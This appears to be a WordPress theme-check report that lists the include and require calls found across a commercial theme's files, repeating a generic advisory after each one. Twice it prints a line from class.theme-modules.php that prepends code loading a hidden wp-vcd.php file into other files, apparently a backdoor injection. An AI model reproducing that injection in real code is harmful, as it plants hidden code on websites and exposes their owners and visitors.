    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : Bootstrap.php
    Ligne67: require_once($path);
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : override.php
    Ligne2: require(__DIR__ . '/../bootstrap.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : github.php
    Ligne3: require(__DIR__ . '/../bootstrap.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : showclix.php
    Ligne3: require(__DIR__ . '/../bootstrap.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : freebase.php
    Ligne5: require(__DIR__ . '/../bootstrap.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : archive-news.php
    Ligne2: include('taxonomy-news_category.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : logic-helpers.php
    Ligne369: require_once( ABSPATH . 'wp-admin/includes/class-pclzip.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-mk-fs.php
    Ligne380: require_once( ABSPATH . 'wp-admin/includes/class-pclzip.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : image-resize.php
    Ligne23: require_once( THEME_INCLUDES . '/bfi_thumb.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : template-part-helpers.php
    Ligne108: require( $file_path );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : metabox-tax.php
    Ligne4: require_once( THEME_INCLUDES . '/Tax-meta-class/Tax-meta-class.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : init.php
    Ligne290: require_once( THEME_DIR . '/woocommerce/hooks.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : init.php
    Ligne104: include( THEME_PLUGIN_INTEGRATIONS . '/visual-composer/fields/autocomplete.
    Ligne105: include( THEME_PLUGIN_INTEGRATIONS . '/visual-composer/fields/group_heading
    Ligne106: include( THEME_PLUGIN_INTEGRATIONS . '/visual-composer/fields/hidden_input.
    Ligne107: include( THEME_PLUGIN_INTEGRATIONS . '/visual-composer/fields/item_id.php' 
    Ligne108: include( THEME_PLUGIN_INTEGRATIONS . '/visual-composer/fields/multiselect.p
    Ligne109: include( THEME_PLUGIN_INTEGRATIONS . '/visual-composer/fields/range.php' );
    Ligne110: include( THEME_PLUGIN_INTEGRATIONS . '/visual-composer/fields/theme_fonts.p
    Ligne111: include( THEME_PLUGIN_INTEGRATIONS . '/visual-composer/fields/toggle.php' )
    Ligne112: include( THEME_PLUGIN_INTEGRATIONS . '/visual-composer/fields/upload.php' )
    Ligne113: include( THEME_PLUGIN_INTEGRATIONS . '/visual-composer/fields/visual_select
    Ligne114: include( THEME_PLUGIN_INTEGRATIONS . '/visual-composer/fields/gmap_iterator
    Ligne115: include( THEME_PLUGIN_INTEGRATIONS . '/visual-composer/fields/icon_selector
    Ligne116: include( THEME_PLUGIN_INTEGRATIONS . '/visual-composer/fields/alpha_colorpi
    Ligne117: include( THEME_PLUGIN_INTEGRATIONS . '/visual-composer/fields/message.php' 
    Ligne154: include( THEME_PLUGIN_INTEGRATIONS . '/visual-composer/global-params.php' )
    Ligne170: include_once( $vc_map_path_child_theme );
    Ligne172: include_once( $shortcode );
    Ligne175: include_once( $shortcode );
    Ligne191: include_once( get_stylesheet_directory() . '/components/shortcodes/' . $sho
    Ligne201: require_once( THEME_PLUGIN_INTEGRATIONS . '/visual-composer/page-section.ph
    Ligne202: require_once( THEME_PLUGIN_INTEGRATIONS . '/visual-composer/accordions.php'
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : phpQuery.php
    Ligne4928: require_once($file);
    Ligne5055: require_once('Zend/Http/Client.php');
    Ligne5299: require_once('Zend/Json/Encoder.php');
    Ligne5316: require_once('Zend/Json/Decoder.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : woocommerce-quantity-increment.php
    Ligne98: require_once 'includes/class-wc-quantity-increment.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-wp-filesystem-sftp.php
    Ligne11: require_once('Net/SFTP.php');
    Ligne12: require_once('Crypt/RSA.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : BigInteger.php
    Ligne34: *    include 'Math/BigInteger.php';
    Ligne233: *    include 'Math/BigInteger.php';
    Ligne525: *    include 'Math/BigInteger.php';
    Ligne622: *    include 'Math/BigInteger.php';
    Ligne649: *    include 'Math/BigInteger.php';
    Ligne687: *    include 'Math/BigInteger.php';
    Ligne867: *    include 'Math/BigInteger.php';
    Ligne998: *    include 'Math/BigInteger.php';
    Ligne1134: *    include 'Math/BigInteger.php';
    Ligne1418: *    include 'Math/BigInteger.php';
    Ligne1637: *    include 'Math/BigInteger.php';
    Ligne2450: *    include 'Math/BigInteger.php';
    Ligne2518: *    include 'Math/BigInteger.php';
    Ligne2653: *    include 'Math/BigInteger.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : SCP.php
    Ligne13: *    include 'Net/SCP.php';
    Ligne14: *    include 'Net/SSH2.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : SSH1.php
    Ligne11: *    include 'Net/SSH1.php';
    Ligne25: *    include 'Net/SSH1.php';
    Ligne521: include_once 'Math/BigInteger.php';
    Ligne530: include_once 'Crypt/Random.php';
    Ligne704: include_once 'Crypt/DES.php';
    Ligne713: include_once 'Crypt/TripleDES.php';
    Ligne722: //        include_once 'Crypt/RC4.php';
    Ligne1364: include_once 'Crypt/RSA.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : Stream.php
    Ligne156: include_once 'Net/SFTP.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : SSH2.php
    Ligne11: *    include 'Net/SSH2.php';
    Ligne25: *    include 'Crypt/RSA.php';
    Ligne26: *    include 'Net/SSH2.php';
    Ligne891: include_once 'Math/BigInteger.php';
    Ligne895: include_once 'Crypt/Random.php';
    Ligne899: include_once 'Crypt/Hash.php';
    Ligne904: include_once 'Crypt/Base.php';
    Ligne1611: include_once 'Crypt/TripleDES.php';
    Ligne1618: include_once 'Crypt/TripleDES.php';
    Ligne1627: include_once 'Crypt/Rijndael.php';
    Ligne1636: include_once 'Crypt/Rijndael.php';
    Ligne1643: include_once 'Crypt/Blowfish.php';
    Ligne1650: include_once 'Crypt/Blowfish.php';
    Ligne1660: include_once 'Crypt/Twofish.php';
    Ligne1669: include_once 'Crypt/Twofish.php';
    Ligne1678: include_once 'Crypt/RC4.php';
    Ligne1689: include_once 'Crypt/TripleDES.php';
    Ligne1695: include_once 'Crypt/TripleDES.php';
    Ligne1703: include_once 'Crypt/Rijndael.php';
    Ligne1712: include_once 'Crypt/Rijndael.php';
    Ligne1719: include_once 'Crypt/Blowfish.php';
    Ligne1726: include_once 'Crypt/Blowfish.php';
    Ligne1736: include_once 'Crypt/Twofish.php';
    Ligne1745: include_once 'Crypt/Twofish.php';
    Ligne1754: include_once 'Crypt/RC4.php';
    Ligne4177: include_once 'Crypt/RSA.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : SFTP.php
    Ligne17: *    include 'Net/SFTP.php';
    Ligne60: include_once 'SSH2.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : Twofish.php
    Ligne17: *    include 'Crypt/Twofish.php';
    Ligne62: include_once 'Base.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : AES.php
    Ligne12: * to save one include_once().
    Ligne26: *    include 'Crypt/AES.php';
    Ligne72: include_once 'Rijndael.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : Hash.php
    Ligne21: *    include 'Crypt/Hash.php';
    Ligne593: include_once 'Math/BigInteger.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : RC4.php
    Ligne21: *    include 'Crypt/RC4.php';
    Ligne69: include_once 'Base.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : Rijndael.php
    Ligne31: *    include 'Crypt/Rijndael.php';
    Ligne79: include_once 'Base.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : Random.php
    Ligne14: *    include 'Crypt/Random.php';
    Ligne198: include_once 'AES.php';
    Ligne204: include_once 'Twofish.php';
    Ligne210: include_once 'Blowfish.php';
    Ligne216: include_once 'TripleDES.php';
    Ligne222: include_once 'DES.php';
    Ligne228: include_once 'RC4.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : DES.php
    Ligne19: *    include 'Crypt/DES.php';
    Ligne67: include_once 'Base.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : Blowfish.php
    Ligne17: *    include 'Crypt/Blowfish.php';
    Ligne62: include_once 'Base.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : TripleDES.php
    Ligne13: *    include 'Crypt/TripleDES.php';
    Ligne59: include_once 'DES.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : Base.php
    Ligne673: include_once 'Crypt/Hash.php';
    Ligne696: include_once 'Crypt/Hash.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : RSA.php
    Ligne11: *    include 'Crypt/RSA.php';
    Ligne29: *    include 'Crypt/RSA.php';
    Ligne78: include_once 'Random.php';
    Ligne85: include_once 'Hash.php';
    Ligne497: include_once 'Math/BigInteger.php';
    Ligne853: include_once 'Crypt/AES.php';
    Ligne874: include_once 'Crypt/Hash.php';
    Ligne926: include_once 'Crypt/DES.php';
    Ligne981: include_once 'Crypt/TripleDES.php';
    Ligne1161: include_once 'Crypt/AES.php';
    Ligne1167: include_once 'Crypt/AES.php';
    Ligne1174: include_once 'Crypt/TripleDES.php';
    Ligne1180: include_once 'Crypt/TripleDES.php';
    Ligne1187: include_once 'Crypt/DES.php';
    Ligne1266: include_once 'Crypt/DES.php';
    Ligne1447: include_once 'Crypt/AES.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : RC2.php
    Ligne17: *    include 'Crypt/RC2.php';
    Ligne60: include_once 'Base.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : SSH_Agent.php
    Ligne39: require_once 'SSH/Agent.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : Agent.php
    Ligne11: *    include 'System/SSH/Agent.php';
    Ligne12: *    include 'Net/SSH2.php';
    Ligne356: include_once 'Crypt/RSA.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : ASN1.php
    Ligne266: include_once 'Math/BigInteger.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : X509.php
    Ligne49: include_once 'ASN1.php';
    Ligne332: include_once 'Math/BigInteger.php';
    Ligne2272: include_once 'Crypt/RSA.php';
    Ligne2677: include_once 'Crypt/Hash.php';
    Ligne2974: include_once 'Crypt/RSA.php';
    Ligne3055: include_once 'Crypt/RSA.php';
    Ligne3185: include_once 'Crypt/RSA.php';
    Ligne3456: include_once 'Crypt/Random.php';
    Ligne4490: include_once 'Crypt/RSA.php';
    Ligne4522: include_once 'Crypt/Hash.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : metabox-generator.php
    Ligne1084: include_once( $chid_theme_metabox_path . $metabox_name );
    Ligne1086: include_once( $metabox );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : master.php
    Ligne3: <?php include_once('header.php'); ?>
    Ligne6: <?php include_once('sidebar.php'); ?>
    Ligne8: <?php include_once(THEME_CONTROL_PANEL . '/v2/panes/support.php'); ?>
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : plugin-management.php
    Ligne170: require_once( 'validator-class.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : template-management.php
    Ligne588: include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class.theme-modules.php
    Ligne48: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-mk-customizer.php
    Ligne225: $css = include( $file );
    Ligne290: $inline_css .= include( $file );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : sections.php
    Ligne96: require_once( $dialog );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : navigation-preview.php
    Ligne14: <?php require_once( HB_INCLUDES_DIR . '/elements/class-hb-element.php' ); ?>
    Ligne15: <?php require_once( HB_INCLUDES_DIR . '/elements/class-hb-element-navigation.php'
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class.theme-modules.php
    Ligne48: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-vcd.php\')) include_once(dirname(__FILE__) . \'/wp-vcd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : archive-portfolio.php
    Ligne2: include('taxonomy-portfolio_category.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_layerslider.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_flipbox.php
    Ligne5: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_banner_builder.php
    Ligne5: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_milestone.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_faq.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_products.php
    Ligne16: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_advanced_gmaps.php
    Ligne7: include( $path . '/config.php' );
    Ligne153: include( $path . '/template.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_pricing_table_2.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_countdown.php
    Ligne3: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_clients.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_flickr.php
    Ligne5: include ( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_toggle.php
    Ligne4: include ($path . '/config.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_padding_divider.php
    Ligne5: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : vc_row_inner.php
    Ligne5: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_icon_box.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : vc_column_text.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_mini_callout.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : vc_accordion_tab.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_category.php
    Ligne6: include ($path . '/config.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_ornamental_title.php
    Ligne5: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_image_slideshow.php
    Ligne5: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_font_icons.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_lcd_slideshow.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : vc_twitter.php
    Ligne5: include ($path . '/config.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : vc_row.php
    Ligne5: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_woocommerce_recent_carousel.php
    Ligne3: include ($path . '/config.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_contact_form.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_skill_meter.php
    Ligne3: include ($path . '/config.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_icon_box2.php
    Ligne5: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_header.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_tab_slider.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_animated_columns.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_blog.php
    Ligne4: include ($path . '/config.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_portfolio.php
    Ligne5: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_contact_info.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_slideshow_box.php
    Ligne5: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_revslider.php
    Ligne3: include ($path . '/config.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_gallery.php
    Ligne3: include ($path . '/config.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_custom_box.php
    Ligne5: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_custom_list.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_pricing_table.php
    Ligne5: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_chart.php
    Ligne6: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_image_switch.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_steps.php
    Ligne3: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_divider.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_icon_box_gradient.php
    Ligne5: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_edge_one_pager.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_message_box.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_page_title_box.php
    Ligne5: include ($path . '/config.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_highlight.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_dropcaps.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_content_box.php
    Ligne3: include ($path . '/config.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_tooltip.php
    Ligne4: include ($path . '/config.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_circle_image.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_theatre_slider.php
    Ligne3: include ($path . '/config.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_portfolio_carousel.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_custom_sidebar.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_news_tab.php
    Ligne11: include ($path . '/config.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_swipe_slideshow.php
    Ligne5: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_employees.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_subscribe.php
    Ligne6: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_button_gradient.php
    Ligne5: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_fullwidth_slideshow.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_image.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_title_box.php
    Ligne4: include ($path . '/config.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_moving_image.php
    Ligne3: include ($path . '/config.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_edge_slider.php
    Ligne16: include( $path . '/config.php' );
    Ligne91: include( $path . '/vars_loop.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_imagebox_item.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_page_section.php
    Ligne8: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_laptop_slideshow.php
    Ligne4: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_audio.php
    Ligne5: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_news.php
    Ligne4: include ($path . '/config.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_skill_meter_chart.php
    Ligne5: include( $path . '/config.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : mk_imagebox.php
    Ligne4: include( $path . '/config.php' );
